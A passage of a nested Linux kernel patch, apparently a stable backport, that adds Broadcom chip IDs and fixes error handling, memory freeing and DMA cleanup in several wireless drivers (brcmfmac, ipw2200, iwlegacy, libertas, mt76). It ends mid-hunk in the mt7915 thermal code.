+@@ -92,8 +98,8 @@ static const struct brcmf_firmware_mapping brcmf_pcie_fwnames[] = {
+ 	BRCMF_FW_ENTRY(BRCM_CC_43664_CHIP_ID, 0xFFFFFFF0, 4366C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43666_CHIP_ID, 0xFFFFFFF0, 4366C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4371_CHIP_ID, 0xFFFFFFFF, 4371),
++	BRCMF_FW_ENTRY(BRCM_CC_4377_CHIP_ID, 0xFFFFFFFF, 4377B3), /* revision ID 4 */
+ 	BRCMF_FW_ENTRY(BRCM_CC_4378_CHIP_ID, 0xFFFFFFFF, 4378B1), /* revision ID 3 */
+-	BRCMF_FW_ENTRY(CY_CC_89459_CHIP_ID, 0xFFFFFFFF, 4355),
+ };
+ 
+ #define BRCMF_PCIE_FW_UP_TIMEOUT		5000 /* msec */
+@@ -1994,6 +2000,17 @@ static int brcmf_pcie_read_otp(struct brcmf_pciedev_info *devinfo)
+ 	int ret;
+ 
+ 	switch (devinfo->ci->chip) {
++	case BRCM_CC_4355_CHIP_ID:
++		coreid = BCMA_CORE_CHIPCOMMON;
++		base = 0x8c0;
++		words = 0xb2;
++		break;
++	case BRCM_CC_4364_CHIP_ID:
++		coreid = BCMA_CORE_CHIPCOMMON;
++		base = 0x8c0;
++		words = 0x1a0;
++		break;
++	case BRCM_CC_4377_CHIP_ID:
+ 	case BRCM_CC_4378_CHIP_ID:
+ 		coreid = BCMA_CORE_GCI;
+ 		base = 0x1120;
+@@ -2590,6 +2607,7 @@ static const struct pci_device_id brcmf_pcie_devid_table[] = {
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4350_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE_SUB(0x4355, BRCM_PCIE_VENDOR_ID_BROADCOM, 0x4355, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4354_RAW_DEVICE_ID, WCC),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_4355_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4356_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43567_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43570_DEVICE_ID, WCC),
+@@ -2600,7 +2618,7 @@ static const struct pci_device_id brcmf_pcie_devid_table[] = {
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43602_2G_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43602_5G_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43602_RAW_DEVICE_ID, WCC),
+-	BRCMF_PCIE_DEVICE(BRCM_PCIE_4364_DEVICE_ID, BCA),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_4364_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4365_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4365_2G_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4365_5G_DEVICE_ID, BCA),
+@@ -2609,9 +2627,10 @@ static const struct pci_device_id brcmf_pcie_devid_table[] = {
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4366_2G_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4366_5G_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4371_DEVICE_ID, WCC),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_43596_DEVICE_ID, CYW),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_4377_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4378_DEVICE_ID, WCC),
+-	BRCMF_PCIE_DEVICE(CY_PCIE_89459_DEVICE_ID, CYW),
+-	BRCMF_PCIE_DEVICE(CY_PCIE_89459_RAW_DEVICE_ID, CYW),
++
+ 	{ /* end: all zeroes */ }
+ };
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h b/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h
+index f4939cf627672..896615f579522 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h
++++ b/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h
+@@ -37,6 +37,7 @@
+ #define BRCM_CC_4350_CHIP_ID		0x4350
+ #define BRCM_CC_43525_CHIP_ID		43525
+ #define BRCM_CC_4354_CHIP_ID		0x4354
++#define BRCM_CC_4355_CHIP_ID		0x4355
+ #define BRCM_CC_4356_CHIP_ID		0x4356
+ #define BRCM_CC_43566_CHIP_ID		43566
+ #define BRCM_CC_43567_CHIP_ID		43567
+@@ -51,12 +52,12 @@
+ #define BRCM_CC_43664_CHIP_ID		43664
+ #define BRCM_CC_43666_CHIP_ID		43666
+ #define BRCM_CC_4371_CHIP_ID		0x4371
++#define BRCM_CC_4377_CHIP_ID		0x4377
+ #define BRCM_CC_4378_CHIP_ID		0x4378
+ #define CY_CC_4373_CHIP_ID		0x4373
+ #define CY_CC_43012_CHIP_ID		43012
+ #define CY_CC_43439_CHIP_ID		43439
+ #define CY_CC_43752_CHIP_ID		43752
+-#define CY_CC_89459_CHIP_ID		0x4355
+ 
+ /* USB Device IDs */
+ #define BRCM_USB_43143_DEVICE_ID	0xbd1e
+@@ -72,6 +73,7 @@
+ #define BRCM_PCIE_4350_DEVICE_ID	0x43a3
+ #define BRCM_PCIE_4354_DEVICE_ID	0x43df
+ #define BRCM_PCIE_4354_RAW_DEVICE_ID	0x4354
++#define BRCM_PCIE_4355_DEVICE_ID	0x43dc
+ #define BRCM_PCIE_4356_DEVICE_ID	0x43ec
+ #define BRCM_PCIE_43567_DEVICE_ID	0x43d3
+ #define BRCM_PCIE_43570_DEVICE_ID	0x43d9
+@@ -90,9 +92,9 @@
+ #define BRCM_PCIE_4366_2G_DEVICE_ID	0x43c4
+ #define BRCM_PCIE_4366_5G_DEVICE_ID	0x43c5
+ #define BRCM_PCIE_4371_DEVICE_ID	0x440d
++#define BRCM_PCIE_43596_DEVICE_ID	0x4415
++#define BRCM_PCIE_4377_DEVICE_ID	0x4488
+ #define BRCM_PCIE_4378_DEVICE_ID	0x4425
+-#define CY_PCIE_89459_DEVICE_ID         0x4415
+-#define CY_PCIE_89459_RAW_DEVICE_ID     0x4355
+ 
+ /* brcmsmac IDs */
+ #define BCM4313_D11N2G_ID	0x4727	/* 4313 802.11n 2.4G device */
+diff --git a/drivers/net/wireless/intel/ipw2x00/ipw2200.c b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+index ca802af8cddcc..d382f20173256 100644
+--- a/drivers/net/wireless/intel/ipw2x00/ipw2200.c
++++ b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+@@ -3427,7 +3427,7 @@ static void ipw_rx_queue_reset(struct ipw_priv *priv,
+ 			dma_unmap_single(&priv->pci_dev->dev,
+ 					 rxq->pool[i].dma_addr,
+ 					 IPW_RX_BUF_SIZE, DMA_FROM_DEVICE);
+-			dev_kfree_skb(rxq->pool[i].skb);
++			dev_kfree_skb_irq(rxq->pool[i].skb);
+ 			rxq->pool[i].skb = NULL;
+ 		}
+ 		list_add_tail(&rxq->pool[i].list, &rxq->rx_used);
+@@ -11383,9 +11383,14 @@ static int ipw_wdev_init(struct net_device *dev)
+ 	set_wiphy_dev(wdev->wiphy, &priv->pci_dev->dev);
+ 
+ 	/* With that information in place, we can now register the wiphy... */
+-	if (wiphy_register(wdev->wiphy))
+-		rc = -EIO;
++	rc = wiphy_register(wdev->wiphy);
++	if (rc)
++		goto out;
++
++	return 0;
+ out:
++	kfree(priv->ieee->a_band.channels);
++	kfree(priv->ieee->bg_band.channels);
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlegacy/3945-mac.c b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+index d7e99d50b287b..9eaf5ec133f9e 100644
+--- a/drivers/net/wireless/intel/iwlegacy/3945-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+@@ -3372,10 +3372,12 @@ static DEVICE_ATTR(dump_errors, 0200, NULL, il3945_dump_error_log);
+  *
+  *****************************************************************************/
+ 
+-static void
++static int
+ il3945_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -3392,6 +3394,8 @@ il3945_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il3945_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -3712,7 +3716,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	}
+ 
+ 	il_set_rxon_channel(il, &il->bands[NL80211_BAND_2GHZ].channels[5]);
+-	il3945_setup_deferred_work(il);
++	err = il3945_setup_deferred_work(il);
++	if (err)
++		goto out_remove_sysfs;
++
+ 	il3945_setup_handlers(il);
+ 	il_power_initialize(il);
+ 
+@@ -3724,7 +3731,7 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	err = il3945_setup_mac(il);
+ 	if (err)
+-		goto out_remove_sysfs;
++		goto out_destroy_workqueue;
+ 
+ 	il_dbgfs_register(il, DRV_NAME);
+ 
+@@ -3733,9 +3740,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	return 0;
+ 
+-out_remove_sysfs:
++out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
+ 	il->workqueue = NULL;
++out_remove_sysfs:
+ 	sysfs_remove_group(&pdev->dev.kobj, &il3945_attribute_group);
+ out_release_irq:
+ 	free_irq(il->pci_dev->irq, il);
+diff --git a/drivers/net/wireless/intel/iwlegacy/4965-mac.c b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+index 721b4042b4bf7..4d3c544ff2e66 100644
+--- a/drivers/net/wireless/intel/iwlegacy/4965-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+@@ -6211,10 +6211,12 @@ out:
+ 	mutex_unlock(&il->mutex);
+ }
+ 
+-static void
++static int
+ il4965_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -6233,6 +6235,8 @@ il4965_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il4965_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -6618,7 +6622,10 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		goto out_disable_msi;
+ 	}
+ 
+-	il4965_setup_deferred_work(il);
++	err = il4965_setup_deferred_work(il);
++	if (err)
++		goto out_free_irq;
++
+ 	il4965_setup_handlers(il);
+ 
+ 	/*********************************************
+@@ -6656,6 +6663,7 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
+ 	il->workqueue = NULL;
++out_free_irq:
+ 	free_irq(il->pci_dev->irq, il);
+ out_disable_msi:
+ 	pci_disable_msi(il->pci_dev);
+diff --git a/drivers/net/wireless/intel/iwlegacy/common.c b/drivers/net/wireless/intel/iwlegacy/common.c
+index 341c17fe2af4d..96002121bb8b2 100644
+--- a/drivers/net/wireless/intel/iwlegacy/common.c
++++ b/drivers/net/wireless/intel/iwlegacy/common.c
+@@ -5174,7 +5174,7 @@ il_mac_reset_tsf(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	memset(&il->current_ht_config, 0, sizeof(struct il_ht_config));
+ 
+ 	/* new association get rid of ibss beacon skb */
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = NULL;
+ 	il->timestamp = 0;
+ 
+@@ -5293,7 +5293,7 @@ il_beacon_update(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	}
+ 
+ 	spin_lock_irqsave(&il->lock, flags);
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = skb;
+ 
+ 	timestamp = ((struct ieee80211_mgmt *)skb->data)->u.beacon.timestamp;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/main.c b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+index f9d11935ed97e..67dfb77fedf79 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/main.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+@@ -788,7 +788,7 @@ static void iwl_mei_handle_amt_state(struct mei_cl_device *cldev,
+ 	if (mei->amt_enabled)
+ 		iwl_mei_set_init_conf(mei);
+ 	else if (iwl_mei_cache.ops)
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false, false);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false);
+ 
+ 	schedule_work(&mei->netdev_work);
+ 
+@@ -829,7 +829,7 @@ static void iwl_mei_handle_csme_taking_ownership(struct mei_cl_device *cldev,
+ 		 */
+ 		mei->csme_taking_ownership = true;
+ 
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true, true);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true);
+ 	} else {
+ 		iwl_mei_send_sap_msg(cldev,
+ 				     SAP_MSG_NOTIF_CSME_OWNERSHIP_CONFIRMED);
+@@ -1774,7 +1774,7 @@ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ 			if (mei->amt_enabled)
+ 				iwl_mei_send_sap_msg(mei->cldev,
+ 						     SAP_MSG_NOTIF_WIFIDR_UP);
+-			ops->rfkill(priv, mei->link_prot_state, false);
++			ops->rfkill(priv, mei->link_prot_state);
+ 		}
+ 	}
+ 	ret = 0;
+diff --git a/drivers/net/wireless/intersil/orinoco/hw.c b/drivers/net/wireless/intersil/orinoco/hw.c
+index 0aea35c9c11c7..4fcca08e50de2 100644
+--- a/drivers/net/wireless/intersil/orinoco/hw.c
++++ b/drivers/net/wireless/intersil/orinoco/hw.c
+@@ -931,6 +931,8 @@ int __orinoco_hw_setup_enc(struct orinoco_private *priv)
+ 			err = hermes_write_wordrec(hw, USER_BAP,
+ 					HERMES_RID_CNFAUTHENTICATION_AGERE,
+ 					auth_flag);
++			if (err)
++				return err;
+ 		}
+ 		err = hermes_write_wordrec(hw, USER_BAP,
+ 					   HERMES_RID_CNFWEPENABLED_AGERE,
+diff --git a/drivers/net/wireless/marvell/libertas/cmdresp.c b/drivers/net/wireless/marvell/libertas/cmdresp.c
+index cb515c5584c1f..74cb7551f4275 100644
+--- a/drivers/net/wireless/marvell/libertas/cmdresp.c
++++ b/drivers/net/wireless/marvell/libertas/cmdresp.c
+@@ -48,7 +48,7 @@ void lbs_mac_event_disconnected(struct lbs_private *priv,
+ 
+ 	/* Free Tx and Rx packets */
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+diff --git a/drivers/net/wireless/marvell/libertas/if_usb.c b/drivers/net/wireless/marvell/libertas/if_usb.c
+index 32fdc4150b605..2240b4db8c036 100644
+--- a/drivers/net/wireless/marvell/libertas/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas/if_usb.c
+@@ -637,7 +637,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
+ 	priv->resp_len[i] = (recvlength - MESSAGE_HEADER_LEN);
+ 	memcpy(priv->resp_buf[i], recvbuff + MESSAGE_HEADER_LEN,
+ 		priv->resp_len[i]);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbs_notify_command_response(priv, i);
+ 
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+diff --git a/drivers/net/wireless/marvell/libertas/main.c b/drivers/net/wireless/marvell/libertas/main.c
+index 8f5220cee1123..78e8b5aecec0e 100644
+--- a/drivers/net/wireless/marvell/libertas/main.c
++++ b/drivers/net/wireless/marvell/libertas/main.c
+@@ -216,7 +216,7 @@ int lbs_stop_iface(struct lbs_private *priv)
+ 
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	priv->iface_running = false;
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+@@ -869,6 +869,7 @@ static int lbs_init_adapter(struct lbs_private *priv)
+ 	ret = kfifo_alloc(&priv->event_fifo, sizeof(u32) * 16, GFP_KERNEL);
+ 	if (ret) {
+ 		pr_err("Out of memory allocating event FIFO buffer\n");
++		lbs_free_cmd_buffer(priv);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/marvell/libertas_tf/if_usb.c b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+index 75b5319d033f3..1750f5e93de21 100644
+--- a/drivers/net/wireless/marvell/libertas_tf/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+@@ -613,7 +613,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	memcpy(priv->cmd_resp_buff, recvbuff + MESSAGE_HEADER_LEN,
+ 	       recvlength - MESSAGE_HEADER_LEN);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbtf_cmd_response_rx(priv);
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n.c b/drivers/net/wireless/marvell/mwifiex/11n.c
+index 4af57e6d43932..90e4011008981 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n.c
+@@ -878,7 +878,7 @@ mwifiex_send_delba_txbastream_tbl(struct mwifiex_private *priv, u8 tid)
+  */
+ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ {
+-	u8 i;
++	u8 i, j;
+ 	u32 tx_win_size;
+ 	struct mwifiex_private *priv;
+ 
+@@ -909,8 +909,8 @@ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ 		if (tx_win_size != priv->add_ba_param.tx_win_size) {
+ 			if (!priv->media_connected)
+ 				continue;
+-			for (i = 0; i < MAX_NUM_TID; i++)
+-				mwifiex_send_delba_txbastream_tbl(priv, i);
++			for (j = 0; j < MAX_NUM_TID; j++)
++				mwifiex_send_delba_txbastream_tbl(priv, j);
+ 		}
+ 	}
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index 06161815c180e..d147dc698c9db 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -737,6 +737,7 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 		return;
+ 
+ 	spin_lock_bh(&q->lock);
++
+ 	do {
+ 		buf = mt76_dma_dequeue(dev, q, true, NULL, NULL, &more, NULL);
+ 		if (!buf)
+@@ -744,6 +745,12 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		skb_free_frag(buf);
+ 	} while (1);
++
++	if (q->rx_head) {
++		dev_kfree_skb(q->rx_head);
++		q->rx_head = NULL;
++	}
++
+ 	spin_unlock_bh(&q->lock);
+ 
+ 	if (!q->rx_page.va)
+@@ -769,12 +776,6 @@ mt76_dma_rx_reset(struct mt76_dev *dev, enum mt76_rxq_id qid)
+ 	mt76_dma_rx_cleanup(dev, q);
+ 	mt76_dma_sync_idx(dev, q);
+ 	mt76_dma_rx_fill(dev, q);
+-
+-	if (!q->rx_head)
+-		return;
+-
+-	dev_kfree_skb(q->rx_head);
+-	q->rx_head = NULL;
+ }
+ 
+ static void
+@@ -975,8 +976,7 @@ void mt76_dma_cleanup(struct mt76_dev *dev)
+ 		struct mt76_queue *q = &dev->q_rx[i];
+ 
+ 		netif_napi_del(&dev->napi[i]);
+-		if (FIELD_GET(MT_QFLAG_WED_TYPE, q->flags))
+-			mt76_dma_rx_cleanup(dev, q);
++		mt76_dma_rx_cleanup(dev, q);
+ 	}
+ 
+ 	mt76_free_pending_txwi(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac.h b/drivers/net/wireless/mediatek/mt76/mt76_connac.h
+index 8ba883b03e500..2ee9a3c8e25c4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac.h
+@@ -370,6 +370,9 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 				 struct sk_buff *skb, struct mt76_wcid *wcid,
+ 				 struct ieee80211_key_conf *key, int pid,
+ 				 enum mt76_txq_id qid, u32 changed);
++u16 mt76_connac2_mac_tx_rate_val(struct mt76_phy *mphy,
++				 struct ieee80211_vif *vif,
++				 bool beacon, bool mcast);
+ bool mt76_connac2_mac_fill_txs(struct mt76_dev *dev, struct mt76_wcid *wcid,
+ 			       __le32 *txs_data);
+ bool mt76_connac2_mac_add_txs_skb(struct mt76_dev *dev, struct mt76_wcid *wcid,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index fd60123fb2840..aed4ee95fb2ec 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -267,9 +267,9 @@ int mt76_connac_init_tx_queues(struct mt76_phy *phy, int idx, int n_desc,
+ }
+ EXPORT_SYMBOL_GPL(mt76_connac_init_tx_queues);
+ 
+-static u16
+-mt76_connac2_mac_tx_rate_val(struct mt76_phy *mphy, struct ieee80211_vif *vif,
+-			     bool beacon, bool mcast)
++u16 mt76_connac2_mac_tx_rate_val(struct mt76_phy *mphy,
++				 struct ieee80211_vif *vif,
++				 bool beacon, bool mcast)
+ {
+ 	u8 mode = 0, band = mphy->chandef.chan->band;
+ 	int rateidx = 0, mcast_rate;
+@@ -319,6 +319,7 @@ out:
+ 	return FIELD_PREP(MT_TX_RATE_IDX, rateidx) |
+ 	       FIELD_PREP(MT_TX_RATE_MODE, mode);
+ }
++EXPORT_SYMBOL_GPL(mt76_connac2_mac_tx_rate_val);
+ 
+ static void
+ mt76_connac2_mac_write_txwi_8023(__le32 *txwi, struct sk_buff *skb,
+@@ -930,7 +931,7 @@ int mt76_connac2_reverse_frag0_hdr_trans(struct ieee80211_vif *vif,
+ 		ether_addr_copy(hdr.addr4, eth_hdr->h_source);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
+ 
+ 	skb_pull(skb, hdr_offset + sizeof(struct ethhdr) - 2);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+index f1e942b9a887b..82fdf6d794bcf 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+@@ -1198,7 +1198,7 @@ enum {
+ 	MCU_UNI_CMD_REPT_MUAR = 0x09,
+ 	MCU_UNI_CMD_WSYS_CONFIG = 0x0b,
+ 	MCU_UNI_CMD_REG_ACCESS = 0x0d,
+-	MCU_UNI_CMD_POWER_CREL = 0x0f,
++	MCU_UNI_CMD_POWER_CTRL = 0x0f,
+ 	MCU_UNI_CMD_RX_HDR_TRANS = 0x12,
+ 	MCU_UNI_CMD_SER = 0x13,
+ 	MCU_UNI_CMD_TWT = 0x14,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c b/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c
+index 6c6c8ada7943b..d543ef3de65be 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c
+@@ -642,7 +642,12 @@ mt76x0_phy_get_target_power(struct mt76x02_dev *dev, u8 tx_mode,
+ 		if (tx_rate > 9)
+ 			return -EINVAL;
+ 
+-		*target_power = cur_power + dev->rate_power.vht[tx_rate];
++		*target_power = cur_power;
++		if (tx_rate > 7)
++			*target_power += dev->rate_power.vht[tx_rate - 8];
++		else
++			*target_power += dev->rate_power.ht[tx_rate];
++
+ 		*target_pa_power = mt76x0_phy_get_rf_pa_mode(dev, 1, tx_rate);
+ 		break;
+ 	default:
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+index fb46c2c1784f2..5a46813a59eac 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+@@ -811,7 +811,7 @@ mt7915_hw_queue_read(struct seq_file *s, u32 size,
+ 		if (val & BIT(map[i].index))
+ 			continue;
+ 
+-		ctrl = BIT(31) | (map[i].pid << 10) | (map[i].qid << 24);
++		ctrl = BIT(31) | (map[i].pid << 10) | ((u32)map[i].qid << 24);
+ 		mt76_wr(dev, MT_FL_Q0_CTRL, ctrl);
+ 
+ 		head = mt76_get_field(dev, MT_FL_Q2_CTRL,
+@@ -996,7 +996,7 @@ mt7915_rate_txpower_get(struct file *file, char __user *user_buf,
+ 
+ 	ret = mt7915_mcu_get_txpower_sku(phy, txpwr, sizeof(txpwr));
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+ 	/* Txpower propagation path: TMAC -> TXV -> BBP */
+ 	len += scnprintf(buf + len, sz - len,
+@@ -1047,6 +1047,8 @@ mt7915_rate_txpower_get(struct file *file, char __user *user_buf,
+ 			 mt76_get_field(dev, reg, MT_WF_PHY_TPC_POWER));
+ 
+ 	ret = simple_read_from_buffer(user_buf, count, ppos, buf, len);
++
++out:
+ 	kfree(buf);
+ 	return ret;
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+index 59069fb864147..24efa280dd868 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+@@ -110,18 +110,23 @@ static int mt7915_eeprom_load(struct mt7915_dev *dev)
+ 	} else {
+ 		u8 free_block_num;
+ 		u32 block_num, i;
++		u32 eeprom_blk_size = MT7915_EEPROM_BLOCK_SIZE;
+ 
+-		mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
+-		/* efuse info not enough */
++		ret = mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
++		if (ret < 0)
++			return ret;
++
++		/* efuse info isn't enough */
+ 		if (free_block_num >= 29)
+ 			return -EINVAL;
+ 
+ 		/* read eeprom data from efuse */
+-		block_num = DIV_ROUND_UP(eeprom_size,
+-					 MT7915_EEPROM_BLOCK_SIZE);
+-		for (i = 0; i < block_num; i++)
+-			mt7915_mcu_get_eeprom(dev,
+-					      i * MT7915_EEPROM_BLOCK_SIZE);
++		block_num = DIV_ROUND_UP(eeprom_size, eeprom_blk_size);
++		for (i = 0; i < block_num; i++) {
++			ret = mt7915_mcu_get_eeprom(dev, i * eeprom_blk_size);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return mt7915_check_eeprom(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/init.c b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+index c810c31fbd6e9..a80ae31e7abff 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+@@ -83,9 +83,23 @@ static ssize_t mt7915_thermal_temp_store(struct device *dev,
+ 
+ 	mutex_lock(&phy->dev->mt76.mutex);
+ 	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 60, 130);
++
++	if ((i - 1 == MT7915_CRIT_TEMP_IDX &&
++	     val > phy->throttle_temp[MT7915_MAX_TEMP_IDX]) ||
++	    (i - 1 == MT7915_MAX_TEMP_IDX &&
++	     val < phy->throttle_temp[MT7915_CRIT_TEMP_IDX])) {
++		dev_err(phy->dev->mt76.dev,
++			"temp1_max shall be greater than temp1_crit.");
++		return -EINVAL;
++	}
++
+ 	phy->throttle_temp[i - 1] = val;
+ 	mutex_unlock(&phy->dev->mt76.mutex);
+ 
++	ret = mt7915_mcu_set_thermal_protect(phy);
++	if (ret)
++		return ret;
++
+ 	return count;
+ }
+ 
+@@ -134,9 +148,6 @@ mt7915_thermal_set_cur_throttle_state(struct thermal_cooling_device *cdev,
+ 	if (state > MT7915_CDEV_THROTTLE_MAX)
+ 		return -EINVAL;
+ 
+-	if (phy->throttle_temp[0] > phy->throttle_temp[1])
+-		return 0;
+-
